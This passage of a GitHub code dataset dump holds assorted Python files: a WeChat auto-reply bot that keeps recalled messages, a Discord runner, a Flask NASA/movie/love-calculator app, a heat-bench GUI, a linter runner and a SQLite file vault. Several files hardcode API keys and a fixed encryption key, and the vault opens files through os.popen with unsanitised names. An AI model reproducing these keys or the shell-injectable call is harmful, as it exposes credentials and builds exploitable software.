int(rec_msg_dict.get(key).get('msg_create_time')) > 600:\n if not rec_msg_dict.get(key).get('msg_type') == 'Text':\n file_path = os.path.join(rec_tmp_dir, rec_msg_dict.get(key).get('msg_content'))\n print(file_path)\n if os.path.exists(file_path):\n os.remove(file_path)\n rec_msg_dict.pop(key)\n\n\ndef weather_schedule():\n user_info = itchat.search_friends(name='龙淑宁')\n if len(user_info) > 0:\n # 拿到用户名\n user_name = user_info[0]['UserName']\n print(\"用户名:\", user_name)\n content = get_weather()\n itchat.send_msg(content, user_name)\n\n\n# 开始轮询任务\ndef start_schedule():\n scheduler = BackgroundScheduler()\n scheduler.add_job(clear_cache, 'interval', minutes=20)\n scheduler.add_job(weather_schedule, 'interval', hours=24)\n scheduler.start()\n try:\n # 其他任务是独立的线程执行\n while True:\n time.sleep(2)\n except (KeyboardInterrupt, SystemExit):\n scheduler.shutdown()\n print('Exit The Job!')\n\n\n@itchat.msg_register([NOTE])\ndef send_msg_helper(msg):\n print('收到一条提醒', msg)\n # 正则表达式搜索消息内容\n search_res = re.search(\"(.*?)\", msg['Content']).group(1)\n old_msg = msg_dict.get(revoke_msg_id, {})\n # 小于11就是非文本消息\n if len(revoke_msg_id) < 11:\n pass\n else:\n msg_body = old_msg.get('msg_from')\n if isinstance(msg_body, str):\n msg_body += ' 撤回了一个文本消息'\n msg_body += old_msg.get('msg_time_rec')\n msg_body += \"内容是[\"\n msg_body += old_msg.get('msg_content')\n msg_body += \"]\"\n # 将撤回消息发送到文件助手\n itchat.send(msg_body, toUserName='filehelper')\n # 删除字典旧消息\n msg_dict.pop(revoke_msg_id)\n else:\n print(\"非文本消息\")\n else:\n print('不是撤回')\n\n\n# 图灵机器人数据接口\n@itchat.msg_register(itchat.content.TEXT)\ndef tuling_reply(msg):\n info = msg['Content'].encode('utf8')\n print(\"收到一条信息:\", msg.text)\n # 图灵API接口\n api_url = 'http://openapi.tuling123.com/openapi/api/v2'\n # 接口请求数据\n data = {\n \"reqType\": 0,\n \"perception\": {\n \"inputText\": {\n \"text\": str(info)\n }\n },\n \"userInfo\": {\n \"apiKey\": KEY,\n \"userId\": \"ctj\"\n }\n }\n headers = {\n 'Content-Type': 'application/json',\n 'Host': 'openapi.tuling123.com',\n 'User-Agent': 'Mozilla/5.0 (Wi`ndows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3486.0 '\n 'Safari/537.36 '\n }\n # 请求接口\n result = requests.post(api_url, headers=headers, json=data).json()\n # 提取text,发送给发信息的人\n reply_text = result['results'][0]['values']['text']\n print(\"图灵机器人回复:\", reply_text)\n itchat.send_msg(reply_text, msg['FromUserName'])\n\n\ndef get_weather():\n city_sum = ['北京', '长沙', '茶陵']\n content = '嗨,小猪猪为你播报\\n'\n for i in city_sum:\n url = 'http://api.map.baidu.com/telematics/v3/weather?' \\\n 'location=%s&output=json&ak=TueGDhCvwI6fOrQnLM0qmXxY9N0OkOiQ&callback=?' 
% i\n content = content + get_weather_content(url)\n return content\n\n\ndef get_weather_content(url):\n # 使用requests发起请求,接受返回的结果\n rs = requests.get(url)\n # 使用loads函数,将json字符串转换为python的字典或列表\n rs_dict = json.loads(rs.text)\n # 取出error\n error_code = rs_dict['error']\n # 如果取出的error为0,表示数据正常,否则没有查询到结果\n if error_code == 0:\n # 从字典中取出数据\n # 根据索引取出天气信息字典\n info_dict = rs_dict['results'][0]\n # 根据字典的key,取出城市名称\n city_name = info_dict['currentCity']\n # 取出pm值\n pm25 = info_dict['pm25']\n # 取出天气信息列表\n weather_data = info_dict['weather_data'][0:2]\n # for循环取出每一天天气的小字典\n content = '当前%s\\n' % city_name\n for weather_dict in weather_data:\n # 取出日期,天气,风级,温度\n date = weather_dict['date']\n weather = weather_dict['weather']\n wind = weather_dict['wind']\n temperature = weather_dict['temperature']\n content = content + '日期:%s\\t天气:%s\\t风级:%s\\t温度:%s\\tpm值:%s\\n' % \\\n (date, weather, wind, temperature, pm25)\n return content\n\n\nif __name__ == '__main__':\n if not os.path.exists(rec_tmp_dir):\n os.mkdir(rec_tmp_dir)\n itchat.auto_login(hotReload=True, enableCmdQR=2, loginCallback=after_login, exitCallback=after_logout)\n itchat.run()\n itchat.login()\n","repo_name":"tanjunchen/spider-project","sub_path":"wechartrobot/roboot.py","file_name":"roboot.py","file_ext":"py","file_size_in_byte":10156,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"32"} +{"seq_id":"38037687535","text":"import json\n\nimport discord\nfrom discord.ext import commands\nfrom discord.ext.commands import Cog\nfrom discord_slash import SlashCommand\n\n\ndef run_bot(*cogs: Cog, override_token=None):\n if override_token is not None:\n token = override_token\n else:\n with open(\"secret.json\", \"r\") as f:\n sec = json.loads(f.read())\n token = sec['token']\n\n intents = discord.Intents.all()\n bot = commands.Bot(command_prefix='?', description=\"\", intents=intents)\n activity = discord.Activity(type=discord.ActivityType.watching, name=\"the server ⏳\")\n slash = SlashCommand(bot, sync_commands=True)\n for cog in cogs:\n bot.add_cog(cog)\n\n bot.run(token)\n","repo_name":"richardwzp/sandman_v2","sub_path":"bot_runner.py","file_name":"bot_runner.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7046794715","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor : t26 \nDate : 8/9/2021\nPurpose: Review tuples\n\"\"\"\n\nimport argparse\n\ndef minmax(items):\n \"\"\"\n Return the maximum and minimum of the collection\n :param items: collection of objects\n :return: min and max\n \"\"\"\n return min(items), max(items)\n\n\ndef main():\n \"\"\"Make your noise here\"\"\"\n # A tuple of any kind of object\n t = (\"Ogden\", 1.99, 2)\n print(f'Tuple is {len(t)} items long')\n print(t[0])\n print(t[1])\n for item in t:\n print(type(item))\n\n a = ((1, 2), (10, 20), (100, 200), \"yo yo\")\n for itemFirst in a:\n print('---')\n for itemSecond in itemFirst:\n print(itemSecond)\n\n minmax(items)\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n # main()\n items = (3, 88, 11, 22, 33)\n lower, upper = minmax(items)\n print(f'minimum {lower} and maximum {upper}')\n # Test for memebership: in, not in\n if 3 in items:\n print(\"I have a 3\")","repo_name":"solidtony/python_hafb","sub_path":"Day1/mytuples.py","file_name":"mytuples.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} 
+{"seq_id":"38313824108","text":"\"\"\" HeatBench GUI class definition \"\"\"\n\nimport os\nfrom tkinter import *\nfrom tkinter import ttk\nfrom queue import Queue\nfrom hb_graph import Graph\nfrom hb_thread import Thread_hb\nfrom hb_process import Process\nfrom hb_enum import *\n\n\n\n\"\"\" Class definition \"\"\"\nclass Gui(object):\n\tdef __init__(self):\n\t\t# Initialize thread driven by GUI and Q for thread->GUI communication\n\t\tself._thread_meas = None\n\t\tself._queue = Queue(maxsize=10)\n\t\tself._samp_period = 0.5\n\t\tself._temp_pain = 35\n\t\tself._temp_burn = 50\n\t\tself._sensor_dir = \"/home/pi/heatbench/sensors\"\n\t\tself._log_dir = \"/home/pi/heatbench/data\"\n\n\t\t# Create master window\n\t\tself._win = Tk()\n\t\tself._win.title('Heat Bench')\n\t\tself._win.geometry(\"1400x640\")\n\n\t\t# Create slave items\n\t\tself._label_sensor = Label(self._win, text='Sensor selection', foreground='blue')\n\t\tself._label_sensor.place(x=20, y=80)\n\n\t\tself._list_sensor = ttk.Combobox(self._win, values=self._get_sensor_list(), height=4, width=35)\n\t\tself._list_sensor.place(x=20, y=100)\n\t\tself._list_sensor.current(0)\n\n\t\tself._num_ref = Label(self._win, text='Ref = - deg', foreground='green')\n\t\tself._num_ref.place(x=20, y=150)\n\n\t\tself._num_sensor = Label(self._win, text='Sensor = - deg', foreground='blue')\n\t\tself._num_sensor.place(x=20, y=180)\n\n\t\tself._num_lim = Label(self._win, text='Pain threshold = {0} deg'.format(self._temp_pain), foreground='yellow')\n\t\tself._num_lim.place(x=20, y=210)\n\n\t\tself._num_lim = Label(self._win, text='Burn threshold = {0} deg'.format(self._temp_burn), foreground='red')\n\t\tself._num_lim.place(x=20, y=240)\n\n\t\tself._butt_start = Button(self._win, text='START', foreground='green', height=4, width=30, command=self._start_process)\n\t\tself._butt_start.place(x=20, y=350)\n\n\t\tself._butt_stop = Button(self._win, text='STOP', foreground='red', height=4, width=30, command=self._stop_process)\n\t\tself._butt_stop.place(x=20, y=450)\n\t\tself._butt_stop[\"state\"] = 'disable'\n\n\t\tself._info_state = Label(self._win, text='')\n\t\tself._info_state.place(x=20, y=550)\n\n\t\tself._graph = Graph(self._win, h=600, w=1000)\n\t\tself._graph.place(x=380, y=20)\n\n\t\t# Run graph update function\n\t\tself._graph.animate(int(1000 * self._samp_period))\n\n\t\t# Run GUI update function\n\t\tself._win.after(1000, self._update_gui)\n\n\t\t# Run event handler\n\t\tself._win.mainloop()\n\n\tdef _start_process(self):\n\t\tself._graph.clear()\n\t\tself._thread_meas = Thread_hb( Process( self._queue, self._samp_period, self._sensor_dir, self._list_sensor.get(), self._log_dir ) )\n\t\tself._thread_meas.start()\n\t\tself._list_sensor[\"state\"] = 'disable'\n\t\tself._butt_start[\"state\"] = 'disable'\n\t\tself._butt_stop[\"state\"] = 'normal'\n\n\tdef _stop_process(self):\n\t\tself._action_stop()\n\n\tdef _update_gui(self):\n\t\twhile not self._queue.empty():\n\t\t\titem = self._queue.get()\n\t\t\tif item[Msg.ID] == Id.INFO:\n\t\t\t\tself._info_state[\"text\"] = item[Msg.DATA]\n\t\t\telif item[Msg.ID] == Id.TEMP:\n\t\t\t\tself._num_ref[\"text\"] = 'Ref = %.1f deg' % item[Msg.DATA][Temp.REF]\n\t\t\t\tself._num_sensor[\"text\"] = 'Sensor = %.1f deg' % item[Msg.DATA][Temp.SENSOR]\n\t\t\t\tself._graph.add_point(item[Msg.DATA], self._temp_pain, self._temp_burn)\n\t\t\telse: # Error\n\t\t\t\tself._action_stop()\n\t\tself._win.after(100, self._update_gui)\n\n\tdef _action_stop(self):\n\t\tself._thread_meas.join()\n\t\tself._thread_meas = 
None\n\t\tself._list_sensor[\"state\"] = 'normal'\n\t\tself._butt_start[\"state\"] = 'normal'\n\t\tself._butt_stop[\"state\"] = 'disable'\n\n\tdef _get_sensor_list(self):\n\t\tsensor_list = []\n\t\tfor file in [ f for f in os.listdir(self._sensor_dir) if os.path.isfile(os.path.join(self._sensor_dir, f)) and f.endswith('.txt') ]:\n\t\t\tsensor_list.append(file.replace('.txt', ''))\n\t\tsensor_list.sort()\n\t\treturn sensor_list\n\n\n\n","repo_name":"JulienP31/temperature_logger","sub_path":"heatbench/hb_gui.py","file_name":"hb_gui.py","file_ext":"py","file_size_in_byte":3637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25796032850","text":"\"\"\"Run linters on files and directories and sort results.\n\nUsage:\n yala ...\n yala --dump-config\n yala --version\n yala -h | --help\n\nOptions:\n --dump-config Show all detected configurations\n --version Show yala and linters' versions.\n -h --help Show this help.\n\n\"\"\"\nimport logging\nimport shlex\nimport subprocess\nimport sys\nfrom itertools import chain\nfrom multiprocessing import Pool\nfrom typing import List\n\nfrom docopt import docopt\n\nfrom . import __version__\nfrom .config import Config\nfrom .linters import LINTERS\n\nLOG = logging.getLogger(__name__)\n\n\nclass LinterRunner:\n \"\"\"Run linter and process results.\"\"\"\n\n config = None\n targets: List[str] = []\n\n def __init__(self, linter_class):\n \"\"\"Set linter class and its configuration.\"\"\"\n linter_class.config = self.config.get_linter_config(linter_class.name)\n self._linter = linter_class()\n\n @classmethod\n def run(cls, linter_cfg_tgts):\n \"\"\"Run a linter and return the results.\"\"\"\n linter_class, cls.config, cls.targets = linter_cfg_tgts\n runner = cls(linter_class)\n return runner.get_results()\n\n def get_results(self):\n \"\"\"Run the linter, parse, and return result list.\n\n If a linter specified by the user is not found, return an error message\n as result.\n \"\"\"\n try:\n stdout, stderr = self._lint()\n # Can't return a generator from a subprocess\n return list(stdout), self._format_stderr(stderr)\n except FileNotFoundError as exception:\n # Error if the linter was not found but was chosen by the user\n if self._linter.name in self.config.user_linters:\n error_msg = (\n f\"Could not find {self._linter.name}. \"\n f\"Did you install it? 
Got exception: {exception}\"\n )\n return [], [error_msg]\n # If the linter was not chosen by the user, do nothing\n return [], []\n\n def _get_command(self):\n \"\"\"Return command with options and targets, ready for execution.\"\"\"\n targets = \" \".join(self.targets)\n cmd_str = self._linter.command_with_options + \" \" + targets\n cmd_shlex = shlex.split(cmd_str)\n return list(cmd_shlex)\n\n def _lint(self):\n \"\"\"Run linter in a subprocess.\"\"\"\n command = self._get_command()\n process = subprocess.run( # nosec\n command,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n check=False,\n )\n LOG.info(\"Finished %s\", self._linter.name)\n stdout, stderr = self._get_output_lines(process)\n return self._linter.parse(stdout, stderr)\n\n @staticmethod\n def _get_output_lines(process):\n return [\n (line for line in output.decode(\"utf-8\").splitlines() if line)\n for output in (process.stdout, process.stderr)\n ]\n\n def _format_stderr(self, lines):\n return [f\"[{self._linter.name}] {line}\" for line in lines]\n\n\nclass Main:\n \"\"\"Parse all linters and aggregate results.\"\"\"\n\n # We only need the ``run`` method.\n\n def __init__(self, config=None, all_linters=None):\n \"\"\"Initialize the only Config object and assign it to other classes.\n\n Args:\n config (Config): Config object.\n all_linters (dict): Names and classes of all available linters.\n\n \"\"\"\n self._classes = all_linters or LINTERS\n self._config = config or Config(self._classes)\n LinterRunner.config = self._config\n\n def lint(self, targets):\n \"\"\"Run linters in parallel and sort all results.\n\n Args:\n targets (list): List of files and folders to lint.\n\n \"\"\"\n LinterRunner.targets = targets\n linters = self._config.get_linter_classes()\n with Pool() as pool:\n linter_cfg_tgts = (\n (linter, self._config, targets)\n for linter in linters\n ) # fmt: skip\n linters_out_err = pool.map(LinterRunner.run, linter_cfg_tgts)\n stdouts, stderrs = zip(*linters_out_err)\n return (sorted(chain.from_iterable(stdouts)),\n chain.from_iterable(stderrs)) # fmt: skip\n\n def run_from_cli(self, args):\n \"\"\"Read arguments, run and print results.\n\n Args:\n args (dict): Arguments parsed by docopt.\n\n \"\"\"\n if args[\"--dump-config\"]:\n self._config.print_config()\n else:\n stdout, stderr = self.lint(args[\"\"])\n self.print_results(stdout, stderr)\n\n @classmethod\n def print_results(cls, stdout, stderr):\n \"\"\"Print linter results and exits with an error if there's any.\"\"\"\n for line in stderr:\n print(line, file=sys.stderr)\n if stdout:\n if stderr: # blank line to separate stdout from stderr\n print(file=sys.stderr)\n cls._print_stdout(stdout)\n else:\n print(\":) No issues found.\")\n\n @staticmethod\n def _print_stdout(stdout):\n for line in stdout:\n print(line)\n issue = \"issues\" if len(stdout) > 1 else \"issue\"\n sys.exit(f\"\\n:( {len(stdout)} {issue} found.\")\n\n\ndef main():\n \"\"\"Entry point for the console script.\"\"\"\n args = docopt(__doc__, version=__version__)\n Main().run_from_cli(args)\n","repo_name":"cemsbr/yala","sub_path":"yala/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5373,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"73409996890","text":"from .api import *\nfrom .school_rank import *\n\njx3_cmd_top100_ = on_command(\"jx3_top100\", aliases={\"百强\"}, priority=5)\n\n@jx3_cmd_top100_.handle()\nasync def jx3_top100(event: GroupMessageEvent, args: Message = CommandArg()):\n '''\n 获取魔盒百强列表:\n\n 
Example:-百强 幽月轮 李重茂\n Example:-百强 幽月轮 李重茂 风波渡\n '''\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [1, 2, 3]:\n return await jx3_cmd_top100_.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 1:\n server = None\n boss = arg[0]\n team = None\n elif len(arg) == 2:\n s = server_mapping(arg[0])\n if s:\n server = s\n boss = arg[1]\n team = None\n else:\n server = None\n boss = arg[0]\n team = arg[1]\n else:\n server = server_mapping(arg[0])\n boss = arg[1]\n team = arg[2]\n data = await get_top100(server, boss, team)\n return await jx3_cmd_top100_.finish(data)\n\njx3_cmd_rank = on_command(\"jx3_rank\", aliases={\"榜单\"}, priority=5)\n\n@jx3_cmd_rank.handle()\nasync def jx3_rank(event: GroupMessageEvent, args: Message = CommandArg()):\n '''\n 获取风云榜单:\n\n Example:-榜单 个人 幽月轮 名士五十强\n Example:-榜单 帮会 幽月轮 恶人神兵宝甲五十强\n Example:-榜单 阵营 幽月轮 赛季恶人五十强\n Example:-榜单 试炼 幽月轮 明教\n '''\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [2, 3]:\n return await jx3_cmd_rank.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 2:\n type1 = arg[0]\n server = None\n type2 = arg[1]\n else:\n type1 = arg[0]\n server = arg[1]\n type2 = arg[2]\n data = await rank_(type_1=type1, server=server, type_2=type2, group_id=event.group_id)\n if type(data) == type([]):\n return await jx3_cmd_rank.finish(data[0])\n else:\n return await jx3_cmd_rank.finish(ms.image(data))\n\njx3_cmd_zlrank = on_command(\"jx3_zlrank\", aliases={\"资历排行\"}, priority=5)\n\n@jx3_cmd_zlrank.handle()\nasync def jx3_zlrank(event: GroupMessageEvent, args: Message = CommandArg()):\n arg = args.extract_plain_text().split(\" \")\n if len(arg) not in [1, 2]:\n return await jx3_cmd_zlrank.finish(\"唔……参数不正确哦,请检查后重试~\")\n if len(arg) == 1:\n server = None\n school = arg[0]\n elif len(arg) == 2:\n server = arg[0]\n school = arg[1]\n data = await zlrank(server, school, str(event.group_id))\n if type(data) == type([]):\n return await jx3_cmd_zlrank.finish(data[0])\n else:\n return await jx3_cmd_zlrank.finish(ms.image(Path(data).as_uri()))\n\nrank = on_command(\"jx3_schoolrank\", aliases={\"门派天梯\",\"天梯\"}, priority=5)\n\n@rank.handle()\nasync def _(event: GroupMessageEvent, args: Message = CommandArg()):\n season = args.extract_plain_text()\n season_data = await get_api(\"https://cms.jx3box.com/api/cms/bps/dps/group?client=std\")\n if season == \"\":\n season_key = season_data[\"data\"][0][\"key\"]\n else:\n flag = False\n for i in season_data[\"data\"]:\n if i[\"label\"] == season:\n season_key = i[\"key\"]\n flag = True\n if flag == False:\n await rank.finish(\"唔……您所提供的赛季暂时无法找到,您可以留空,这样音卡将提供最新赛季的天梯榜。\")\n else:\n img = await get_school_rank(season_key)\n await rank.finish(ms.image(img))\n img = await get_school_rank(season_key)\n await rank.finish(ms.image(img))","repo_name":"codethink-cn/Inkar-Suki","sub_path":"src/plugins/jx3/rank/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"32"} +{"seq_id":"2342140554","text":"from flask import Flask,render_template,request\r\n\r\nimport requests\r\nfrom urllib.request import urlretrieve\r\nfrom pprint import PrettyPrinter\r\nimport random\r\nfrom tmdbv3api import TMDb\r\nfrom tmdbv3api import Movie\r\n\r\n\r\n\r\napp=Flask(__name__)\r\n\r\n@app.route('/')\r\n\r\ndef home():\r\n return render_template('home.html')\r\n\r\n@app.route('/about')\r\ndef about():\r\n return render_template('about.html')\r\n\r\n@app.route('/nasa')\r\n\r\n\r\n\r\ndef nasa():\r\n\r\n url = 
'https://api.nasa.gov/planetary/apod?api_key='\r\n api_key = 'bfkOSaZmSPBZwMqpcksD249bczLgM3OyikzpNYSl'\r\n\r\n \r\n pp=PrettyPrinter()\r\n URL_APOD = \"https://api.nasa.gov/planetary/apod\"\r\n\r\n try:\r\n response = requests.get(f\"{url}{api_key}\").json()\r\n pp.pprint(response)\r\n img_url=response['url']\r\n img_title=response['title']\r\n img_exp=response['explanation']\r\n print(img_exp)\r\n res= {'i_url':img_url,'i_tit':img_title,'i_exp':img_exp}\r\n # print(res.i_exp)\r\n\r\n return render_template('nasa.html',res=res)\r\n except Exception as e:\r\n print()\r\n res= {'i_url':\"\",'i_tit':\"network issue\",'i_exp':\" network issue\"}\r\n return render_template('nasa.html',res=res)\r\n\r\n@app.route('/more',methods =[\"GET\", \"POST\"])\r\n\r\n\r\n\r\n\r\ndef more():\r\n \r\n chance=random.randint(0, 1)\r\n \r\n if request.method != \"GET\":\r\n \r\n \r\n \r\n n1 = request.form.get(\"fname\")\r\n \r\n n2 = request.form.get(\"lname\") \r\n\r\n url = \"https://love-calculator.p.rapidapi.com/getPercentage\"\r\n querystring = {\"sname\":n1,\"fname\":n2}\r\n headers = {\r\n \"X-RapidAPI-Host\": \"love-calculator.p.rapidapi.com\",\r\n \"X-RapidAPI-Key\": \"0de338cd14msh8af713bea17cde5p17b676jsn77fbba8c1def\"\r\n }\r\n response = requests.request(\"GET\", url, headers=headers, params=querystring).json()\r\n print(response)\r\n n1=response['fname']\r\n n2=response['sname']\r\n n3=response['percentage']\r\n print(n1,n2,n3)\r\n\r\n res={'x':n1,'y':n2,'z':n3, 'n' :chance}\r\n\r\n\r\n return render_template('more.html',res=res)\r\n \r\n # response={\"fname\":\"-------\",\"sname\":\"--------\",\"percentage\":\"%\",\"result\":\"-------\"} \r\n res={'x':\"-\",'y':\"-\",'z':\"-\",'n' :2} \r\n return render_template('more.html',res=res)\r\n\r\n\r\n@app.route('/movies')\r\n\r\ndef movies():\r\n\r\n\r\n\r\n\r\n return render_template('movies.html')\r\n\r\n\r\n@app.route('/movie-info/')\r\n\r\ndef calll(Number):\r\n id=int(Number)\r\n\r\n \r\n try:\r\n tmdb = TMDb()\r\n\r\n tmdb.api_key = 'af5f6a137e02c292119db472e96cca2b'\r\n tmdb.language = 'en'\r\n tmdb.debug = True\r\n\r\n movie = Movie()\r\n m = movie.details(Number)\r\n\r\n \r\n myurl='https://image.tmdb.org/t/p/w500'+m.poster_path\r\n\r\n genre=[]\r\n\r\n li=m.genres\r\n for el in li :\r\n genre.append(el['name'])\r\n\r\n res={ 'id': m.id ,'title':m.title,'overview':m.overview, 'rating': m.vote_average,'imgpath':myurl,'genre':genre}\r\n print(res)\r\n\r\n return render_template('movieinfo.html',res=res)\r\n except Exception:\r\n return \" unable to reach try later\"\r\n\r\n\r\n pass\r\n\r\n@app.route('/fav')\r\n\r\ndef fav():\r\n return render_template('fav.html')\r\n \r\n\r\n\r\n \r\n\r\nif __name__=='__main__':\r\n app.run(debug=True)","repo_name":"prajwalsable99/life_uncut","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72475652891","text":"from .config import CfgNode as CN\n\n\n_C = CN()\n\n_C.MAX_EPOCH = 20\n_C.NUM_WORKERS = 16\n_C.BATCH_SIZE = 64\n_C.DEVICE = 'cuda'\n# OUTPUT\n_C.OUTPUT_NAME = ''\n_C.EXTRA = ''\n# TASK\n_C.TASK = 'TEST'\n_C.DATE = ''\n\n# dataset\n_C.DATASET = CN()\n_C.DATASET.TRAIN_MODE = 'train'\n_C.DATASET.NUM_CLASSES = 5\n_C.DATASET.ROOT_PATH = ''\n_C.DATASET.AUGMENTATION = CN()\n_C.DATASET.AUGMENTATION.NAME = ''\n_C.DATASET.FUNC = 'CustomDataset'\n\n\n# model\n_C.MODEL = CN()\n_C.MODEL.NAME = ''\n_C.MODEL.WEIGHTS = None\n_C.MODEL.PRETRAINED = True\n\n\n# 
METRIC\n_C.MODEL.METRIC = CN()\n_C.MODEL.METRIC.NAME = None\n\n# HEAD\n_C.MODEL.HEAD = CN()\n_C.MODEL.HEAD.NAME = 'MultiHead'\n\n# INPUT\n_C.INPUT = CN()\n_C.INPUT.SIZE = (360, 240)\n\n# SOLVER\n_C.SOLVER = CN()\n_C.SOLVER.OPTIMIZER = CN()\n_C.SOLVER.OPTIMIZER.NAME = 'RAdam'\n_C.SOLVER.OPTIMIZER.LR_START = 2e-3\n\n# LOSS\n_C.SOLVER.LOSS = CN()\n_C.SOLVER.LOSS.NAME = 'CrossEntropyLoss'\n\n_C.SOLVER.ACCUMULATE_STEPS = 1\n","repo_name":"markson14/PyTorchEngine","sub_path":"engine/config/defaults.py","file_name":"defaults.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3353567204","text":"#--*--coding:utf-8\n#Author:cnn\n#画椭圆\nimport pygame\nimport sys\nfrom pygame.locals import *\n# pygame 初始化\npygame.init()\n# 设置背景颜色和线条颜色\nWHITE = (255, 255, 255)\nGREEN = (0, 255, 0)\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n# 设置背景框大小\nsize = width, height = 600, 600\n#position = width // 2, height // 2\n# 设置帧率,返回clock 类\nclock = pygame.time.Clock()\n\nscreen = pygame.display.set_mode(size)\npygame.display.set_caption(\"llls make\")\n\n# 填充背景色\nscreen.fill(WHITE)\n\n# 画一个圆和一个椭圆\npygame.draw.ellipse(screen, RED, (100, 100, 400, 100), 1)\npygame.draw.ellipse(screen, GREEN, (100, 100, 400, 400), 1)\n# 刷新图\npygame.display.flip()\nclock.tick(60)\nwhile True:\n for event in pygame.event.get():\n # 查找关闭窗口事件\n if event.type == QUIT:\n sys.exit()\n\n","repo_name":"gustcnn/SolarSystem","sub_path":"com/solar/oval.py","file_name":"oval.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35917391879","text":"import sqlite3\r\nimport os\r\nfrom cryptography.fernet import Fernet\r\nimport ezlog\r\n\r\nvault_log = ezlog.MyLogger(\r\n name='vault_log', form='time:[level][function]: msg', file='logs/vault_log.log')\r\n\r\n\r\nclass Vault:\r\n KEY = b'f0e0HQdoUptcnOHYOjmhbjiYCYzPojVFSOhsoLwOMik='\r\n CRYPTER = Fernet(KEY)\r\n\r\n def __init__(self, name, encrypted=False):\r\n\r\n self.make_dir('cache')\r\n self.make_dir('temp')\r\n self.make_dir('data')\r\n self.name = name\r\n self.db = sqlite3.connect(name)\r\n self.c = self.db.cursor()\r\n try:\r\n self.db.execute('''\r\n CREATE TABLE files (filename varchar(255) PRIMARY KEY NOT NULL UNIQUE, data TEXT)''')\r\n vault_log.info('creating database')\r\n except Exception:\r\n pass\r\n\r\n self.encrypted = encrypted\r\n\r\n @staticmethod\r\n def make_dir(name):\r\n try:\r\n os.mkdir(name)\r\n vault_log.info(f'making {name} folder')\r\n except FileExistsError:\r\n pass\r\n\r\n def store(self, file):\r\n basename = os.path.basename(file)\r\n vault_log.debug(f'Attempting to add file: \"{basename}\" to the vault')\r\n with open(file, 'rb') as f:\r\n data = f.read() if not self.encrypted else self.encrypt(f.read())\r\n with self.db:\r\n self.c.execute(\"insert into files values (?, ?);\",\r\n (basename, data))\r\n os.remove(file)\r\n vault_log.debug(f'file: \"{basename}\" successfully added')\r\n\r\n def show_files(self):\r\n output = self.c.execute('select filename from files')\r\n vault_log.info('items listed')\r\n return [name[0]for name in output.fetchall()]\r\n\r\n def get(self, file):\r\n temp_items = os.listdir('temp')\r\n vault_log.debug(f'Attempting to get file: \"{file}\" from vault')\r\n if file in self.keys and file not in temp_items:\r\n vault_log.debug(f'file: \"{file}\" written to temp folder')\r\n result = self.c.execute(\r\n 'SELECT * FROM files WHERE filename=?', 
(file,))\r\n filename, data = result.fetchone()\r\n if self.encrypted:\r\n data = self.decrypt(data)\r\n with open('temp/' + filename, 'wb') as unlock:\r\n unlock.write(data)\r\n os.popen(f'\"temp/{file}\"')\r\n vault_log.info(f'file: \"{file}\" ran successfully')\r\n else:\r\n vault_log.debug(\r\n f'file: \"{file}\" is not in database or is already in temporary view folder')\r\n\r\n def remove(self, file):\r\n vault_log.debug(f'attempting to delete file: \"{file}\" from the vault')\r\n if file in self.keys:\r\n result = self.c.execute(\r\n 'SELECT * FROM files WHERE filename=?', (file,))\r\n filename, data = result.fetchone()\r\n if self.encrypted:\r\n data = self.decrypt(data)\r\n with self.db:\r\n self.c.execute(\r\n 'DELETE FROM files where filename=?', (filename,))\r\n self.vacuum()\r\n vault_log.debug(\r\n f'file: \"{file}\" was deleted from database')\r\n return filename, data\r\n\r\n def move_out(self, file, destination='.'):\r\n if file in self.keys:\r\n filename, data = self.remove(file)\r\n with open(f'{destination}/{filename}', 'wb') as moved:\r\n moved.write(data)\r\n vault_log.debug(\r\n f'file: \"{file}\" moved out of the vault to {destination}')\r\n\r\n def vacuum(self):\r\n with self.db:\r\n self.c.execute('VACUUM')\r\n vault_log.info('database extra size vacuumed')\r\n\r\n @staticmethod\r\n def encrypt(data):\r\n vault_log.info('data for file encrypted')\r\n return Vault.CRYPTER.encrypt(data)\r\n\r\n @staticmethod\r\n def decrypt(data):\r\n vault_log.info('data for file dencrypted')\r\n return Vault.CRYPTER.decrypt(data)\r\n\r\n @property\r\n def keys(self):\r\n output = self.c.execute('SELECT filename FROM files')\r\n vault_log.info('items listed')\r\n return [name[0] for name in output.fetchall()]\r\n\r\n @staticmethod\r\n def clean_up():\r\n vault_log.debug('cleaning up temporary')\r\n for file in os.listdir('temp'):\r\n os.remove('temp/' + file)\r\n vault_log.debug('temporary items successfully removed')\r\n","repo_name":"hank2q/The-Vault","sub_path":"vault.py","file_name":"vault.py","file_ext":"py","file_size_in_byte":4387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14295034684","text":"def sort_rows(lst):\n\n return sorted(lst, key=lambda row: sum(row))\n\ndef print_list(lst):\n\n for row in lst:\n print(\" \".join(str(x) for x in row))\n\n\nrows = int(input(\"Enter the number of rows: 